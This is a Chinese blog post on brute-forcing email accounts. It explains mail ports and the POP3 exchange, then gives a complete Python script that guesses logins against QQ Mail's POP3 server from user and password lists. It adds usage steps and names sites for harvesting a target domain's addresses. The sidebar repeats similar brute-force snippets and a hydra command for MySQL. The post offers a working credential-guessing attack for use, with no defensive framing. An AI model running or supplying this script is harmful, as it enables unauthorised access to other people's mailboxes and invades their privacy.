关于邮箱爆破

最新推荐文章于 2024-05-19 19:26:13 发布
最新推荐文章于 2024-05-19 19:26:13 发布
阅读量9.3k 收藏 22
点赞数 3
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46661122/article/details/110303957
版权

爆破邮箱有俩种姿势:

一是对网页版的邮箱登录处进行爆破

二是对邮箱的端口号进行爆破

SMTP默认端口是25 ,SSL加密端口是 465

POP3默认端口是110,SSL加密端口是 995

IMAP默认端口是143,SSL加密端口是 993

其中电子邮件的发送协议是SMTP, 邮件的接收协议是IMAP和POP3

其中POP3协议,当客户机与服务器建立联系时,一旦客户机提供了自己身份并成功确认,即由认可状态转入处理状态,在完成相应的操作后客户机发出QUIT命令,则进入更新状态,更新之后最后重返认可状态。

等待连接→身份确认→QUIT命令→认可→处理→更新→已处于认可状态

POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息。

QQ邮箱开启POP3协议


邮箱登录生成授权码,不是QQ密码噢

SMTP和POP3协议SSL加密传输端口号
Python爆破邮箱登录授权码

import threading, time, random, sys, poplib 
from copy import copy 
 
if len(sys.argv) !=3: 
  print "\n\t   EmailPopBruteForcer v1.0"
  print "\t   --------------------------------------------------\n"
  print "\t    Usage: ./qmailpopbrute.py <userlist> <wordlist>\n"
  sys.exit(1) 
    
server = "pop.qq.com"
success = [] 
 
try: 
    users = open(sys.argv[1], "r").readlines() 
except(IOError): 
    print "[-] Error: Check your userlist path\n"
    sys.exit(1) 
    
try: 
    words = open(sys.argv[2], "r").readlines() 
except(IOError): 
    print "[-] Error: Check your wordlist path\n"
    sys.exit(1) 
    
try: 
  pop = poplib.POP3(server,110) 
  welcome = pop.getwelcome() 
  print welcome 
  pop.quit() 
except (poplib.error_proto): 
  welcome = "No Response"
  pass
 
def mailbruteforce(listuser,listpwd): 
  if len(listuser) < 1 or len(listpwd) < 1 : 
    print "An error occurred: No user or pass list"
    return 1
  for user in listuser: 
    for value in listpwd : 
      user = user.replace("\n","") 
      value = value.replace("\n","") 
        
      try: 
        print "-"*12
          
        print "[+] User:",user,"Password:",value 
        time.sleep(2) 
        pop = poplib.POP3(server,110) //连接pop3服务器端口
        pop.user(user) //设置用户名
        auth = pop.pass_(value) //设置密码
        print auth 
        if auth.split(' ')[0]!= "+OK" : //判断是否为OK
          pop.quit() 
          print "unknown error !"
          continue
        if pop.stat()[1] is None or pop.stat()[1] < 1 : 
          pop.quit() 
          print "unknown error !"
          continue
        #print "\t\t\n\nLogin successful:",user, value 
        #print "\t\tMail:",pop.stat()[0],"emails" 
        #print "\t\tSize:",pop.stat()[1],"bytes\n\n" 
        ret = (user,value,pop.stat()[0],pop.stat()[1]) 
        success.append(ret) 
        #print len(success) 
        pop.quit() 
        break
      except: 
        #print "An error occurred:", msg 
        pass
 
 
 
print "\n\t EmailPopBruteForcer v1.0"
print "\t   --------------------------------------------------\n"
print "[+] Server:",server 
print "[+] Port: 995"
print "[+] Users Loaded:",len(users) 
print "[+] Words Loaded:",len(words) 
print "[+] Server response:",welcome,"\n"
mailbruteforce(users,words) 
 
print "\t[+] have weakpass :\t",len(success) 
if len(success) >=1: 
  for ret in success: 
    print "\n\n[+] Login successful:",ret[0], ret[1] 
    print "\t[+] Mail:",ret[2],"emails"
    print "\t[+] Size:",ret[3],"bytes\n"
print "\n[-] Done"


使用:Python hacker.py user.txt passwd.txt
爆破完成


https://hunter.io/

https://www.email-format.com/i/search/

这俩个网站只要输入目标域名,就可以从互联网上搜到对应格式的邮箱账号

收集到邮箱账号后,我们还需要对邮箱账号的可用性进行检测。因为有些邮箱账号很有可能已经弃用了

https://github.com/Tzeross/verifyemail

白海客
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
python邮箱爆破_企业邮箱爆破脚本
weixin_39685024的博客
01-30 828
#!usr/bin/python#!coding:utf-8import threading,time,random,sys,poplibfrom copy import copyif len(sys.argv) !=4:print "\t Note: 邮箱类型为:'163','tencent','coremail','236','exchange' \n"print "\t Note...
IMAP 爆破脚本
Big World
01-02 1093
IMAP(Internet Mail Access Protocol)以前称作交互邮件访问协议(Interactive Mail Access Protocol),是一个应用层协议。IMAP是斯坦福大学在1986年开发的一种邮件获取协议。它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等...
常见协议爆破—ssh、rdp、smtp、pop3、imap等
qq_43058348的博客
04-27 3103
环境 kali- - - - 任意PC 常用爆破工具 msf、hydra、medusa、patator等 rdp hydra -l username -p password rdp://ip python patator.py rdp_login host=10.10.70.4 user='admin' password = '1' #上面这个主意要先export DISPLAY=:0.0 ssh hydra -l username -p password ssh://ip medusa -u u
邮箱爆破
weixin_30564901的博客
08-29 1484
pop3,smtp协议爆破 kali下的xhydra 自己写的pop3爆破脚本 https://github.com/AdministratorGithub/pop3_crack 转载于:https://www.cnblogs.com/junsec/p/11431402.html
Python 渗透测试:电子邮件 || Redis || FTP || SSH || MySQL 集成爆破工具.
最新发布
网络安全领域___专研者.
05-19 320
集合爆破里面包含了:电子邮件爆破工具,Redis爆破工具,FTP爆破工具,SSH爆破工具,MySQL爆破工具。
Exchange邮箱爆破和信息收集
谢公子的博客
08-10 7473
在渗透测试过程中,经常会碰到使用Exchange邮箱的系统。但是Exchangeweb端是无法爆破的,可以爆破客户端。 Invoke-PasswordSprayEWS MailSniper
《Web安全之机器学习入门》笔记:第六章 6.3决策树检测POP3暴力破解
mooyuan的博客
01-30 1466
1.源码修改 (1)版本更改导致问题 源码为python2,改为python3 #头文件变更 from sklearn import model_selection #调用函数变更 print(model_selection.cross_val_score(clf, x, y, n_jobs=-1, cv=10)) (2)运行报错 INTEL MKL ERROR: ҳ���ļ�̫С���޷���ɲ����� mkl_intel_thread.dll. Intel MKL FATAL ER.
常见端口漏洞
qq_42430287的博客
04-26 3106
常见端口漏洞 端口 服与漏洞 21/69 ftp/tftp:文件传输协议,漏洞1.爆破2.嗅探溢出3.后门4.匿名访问 22 ssh,漏洞:爆破,openssh漏洞 23 telnet:远程连接,漏洞:爆破,嗅探 25 smtp:邮件服务,漏洞:弱口令,未授权访问,邮件伪造 53 dns:域名系统,漏洞:dns区域传输,劫持,缓存投毒,隧道技术刺透防火墙 80/8080 apache/tomcat/nginx/axis2,漏洞,爆破,弱口令,http慢速攻击(可以把服务器
多线程邮箱爆破易语言代码
08-19
邮箱爆破的场景下,多线程可以显著提高效率,因为它允许程序并行地尝试多个密码,而不是逐一顺序执行,大大减少了整体的执行时间。 易语言提供了丰富的语法和库支持,使得开发者可以轻松地创建和管理线程。在实现...
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破
python制作企业邮箱爆破脚本
12-23
按照师傅给的任务,写了一个企业邮箱爆破脚本,后续还有FTP,SSH等一些爆破的脚本。 我先说下整体思路: 总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,...
邮箱爆破脚本。代码
11-29
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破
163爆破邮箱
07-27
爆破163邮箱的py小脚本,强大实用!
kali之端口爆破扫描
sinat_38378265的博客
03-25 4426
一.nmap扫描端口情况 在终端输入nmap+目标机的ip,即可对目标机的ip的端口进行扫描。 二.使用hydra对目标端口进行爆破 1.首先了解哪些目标端口可以爆破的 文件传输协议ftp:21 Linux的远程连接ssh:22 telnet的远程连接:23 pop3端口:110...
常用的端口攻击
软件测试技术的博客
03-05 2930
端口渗透总结 0x00 背景 端口渗透过程中我们需要关注几个问题: 1、 端口的banner信息 2、 端口上运行的服务 3、 常见应用的默认端口 当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap了吧!我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具; 服务默认端口 公认端口(Well Known Ports):0-1023......
smtp渗透
m0_46689007的博客
11-30 2936
我们可以透过协议,指定了一条消息发送至一个或多个接收者,然后消息文本会被传输。例如,他们可以向财务部门发送一封看似来自 CFO 的令人信服的电子邮件,并紧急要求向攻击者的账户进行大笔银行转账。电子邮件库将这些地址转换为 RCPT TO 命令,并将邮件不仅发送给预期的收件邮箱,还发送给这些额外构造的收件邮箱。用于利用邮件服务器和网络邮件应用程序,这些应用程序根据用户提供的未正确过滤的输入构造恶意SMTP 语句,将攻击者控制的 SMTP 命令注入从应用程序传输到 SMTP 服务器的数据中,以发送垃圾邮件。
python邮箱爆破_python制作企业邮箱爆破脚本
weixin_39908082的博客
01-30 594
按照师傅给的任务,写了一个企业邮箱爆破脚本,后续还有FTP,SSH等一些爆破的脚本。我先说下整体思路:总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息.1.首先验证参数是否正确Sys.argv[]是用来获取命令行参数的,sys.argv[0]表示代...
41.网络安全渗透测试—[穷举篇4]—[SMTP邮箱穷举]
qwsn
08-06 5009
一、SMTP邮箱暴力破解 1、配置邮箱服务器:`hosts文件` 2、MailCracker的使用:`暴力破解`
Exchange 暴力破解与防范
08-25 1889
针对Exchange漏洞的利用有很多种方式,但大多数攻击手法首先要有一个邮箱账号,所以,最重要的一步就是获取邮箱账号。获取邮箱账号最常见的攻击方式有两种,钓鱼邮件以及暴力破解。本文整理了Exchange暴力破解的方式,以及记录和分享一些防范方面的小技巧。01、Exchange暴力破解(1)OWA登录爆破Exchange邮箱登录界面,默认没有验证码,也没有登录爆破限制,可通过BurpSuite尝试遍...
hydra爆破mysql
04-27
Hydra是一款常用的密码爆破工具,可以用于测试系统的密码强度。它支持多种协议和服务,包括MySQL数据库。下面是使用Hydra进行MySQL爆破的一般步骤: 1. 安装Hydra:首先需要在你的系统上安装Hydra。你可以从Hydra的官方网站或者其他可靠的资源中获取安装包,并按照指示进行安装。 2. 确定目标:确定你要进行爆破的MySQL服务器的IP地址和端口号。 3. 构建密码字典:准备一个密码字典文件,其中包含可能的密码组合。你可以使用常见的密码字典,也可以自己创建一个。 4. 运行Hydra:使用以下命令运行Hydra进行MySQL爆破: ``` hydra -L <用户名字典文件> -P <密码字典文件> <目标IP地址> mysql ``` 其中,`<用户名字典文件>`是包含可能的用户名列表的文件路径,`<密码字典文件>`是包含可能的密码列表的文件路径,`<目标IP地址>`是要爆破的MySQL服务器的IP地址。 5. 等待结果:Hydra将自动尝试使用用户名字典和密码字典中的组合进行爆破。等待Hydra完成爆破过程,它将输出成功找到的用户名和密码组合。 请注意,使用Hydra进行密码爆破是一种潜在的非法行为,除非你有合法的授权或者在合法的渗透测试环境中进行。在任何情况下,都要遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值